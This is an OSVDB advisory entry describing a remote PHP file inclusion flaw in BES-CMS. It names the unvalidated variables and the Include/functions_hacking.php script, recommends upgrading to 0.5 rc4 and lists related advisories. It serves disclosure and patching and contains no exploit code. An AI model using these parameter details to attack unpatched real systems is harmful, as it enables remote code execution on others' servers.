BES-CMS hacking.php Arbitrary Code Execution

2003-12-22T07:35:44
ID OSVDB:3421
Type osvdb
Reporter OSVDB
Modified 2003-12-22T07:35:44

Description

Vulnerability Description

BES-CMS contains a flaw that allows a malicious user to force a script to include arbitrary PHP code. This flaw exists because the application does not validate "$inc_path" and "$PATH_Includes" variables upon submission to the Include/functions_hacking.php script. This allows a user to create a specially crafted URL specifying a malicious file from a remote system, allowing the attacker to execute code on the vulnerable system, leading to a loss of integrity.

Solution Description

Upgrade to version 0.5 rc4 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Short Description

BES-CMS contains a flaw that allows a malicious user to force a script to include arbitrary PHP code. This flaw exists because the application does not validate "$inc_path" and "$PATH_Includes" variables upon submission to the Include/functions_hacking.php script. This allows a user to create a specially crafted URL specifying a malicious file from a remote system, allowing the attacker to execute code on the vulnerable system, leading to a loss of integrity.

References:

Vendor Specific Solution URL: http://bes.h6p.org/download/ Secunia Advisory ID:10477 Related OSVDB ID: 3418 Related OSVDB ID: 3419 Related OSVDB ID: 3140 Related OSVDB ID: 3406 Related OSVDB ID: 3420 Other Solution URL: http://www.phpsecure.info/v2/.php Other Advisory URL: http://www.security-corporation.com/advisories-024.html Other Advisory URL: http://archives.neohapsis.com/archives/bugtraq/2003-12/0299.html Other Advisory URL: http://archives.neohapsis.com/archives/vulnwatch/2003-q4/0071.html Keyword: File Inclusion ISS X-Force ID: 14043 Bugtraq ID: 9268